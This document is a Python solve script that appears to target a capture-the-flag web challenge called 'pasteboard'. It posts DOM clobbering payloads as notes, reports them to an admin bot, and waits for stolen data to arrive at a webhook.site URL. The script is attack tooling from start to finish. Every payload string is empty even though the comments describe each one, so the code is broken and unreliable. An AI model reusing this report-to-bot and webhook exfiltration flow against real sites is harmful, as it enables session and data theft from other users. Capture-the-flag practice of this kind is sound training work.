import requests
import time
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"
# DOM clobbering payload - we need to trigger an error AND control the path
# The key is that we need window.errorReporter.path to be controlled
payloads = [
# Method 1: Use form with input to create nested property
f'''
''',
# Method 2: Use iframe name attribute for path.value
f'''
''',
# Method 3: Direct script injection via data URI
f'''
''',
# Method 4: Use form with nested structure
f'''
''',
]
for i, payload in enumerate(payloads, 1):
print(f"\n[*] Trying DOM clobbering payload {i}/{len(payloads)}...")
print(f"[*] Payload preview: {payload[:100]}...")
session = requests.Session()
response = session.post(
f"{BASE_URL}/note/new",
data={"title": f"DOM Clobber {i}", "body": payload},
allow_redirects=False
)
if response.status_code == 302:
location = response.headers.get('Location')
note_url = f"{BASE_URL}{location}"
print(f"[+] Paste created: {note_url}")
report_response = session.post(f"{BASE_URL}/report", data={"url": location})
if report_response.status_code == 202:
print(f"[+] Reported to bot - waiting 35 seconds...")
time.sleep(35)
else:
print(f"[-] Failed to report: {report_response.status_code}")
else:
print(f"[-] Failed to create paste: {response.status_code}")
time.sleep(2)
print("\n[*] All payloads sent. Check webhook now!")
print(f"[*] Webhook URL: https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")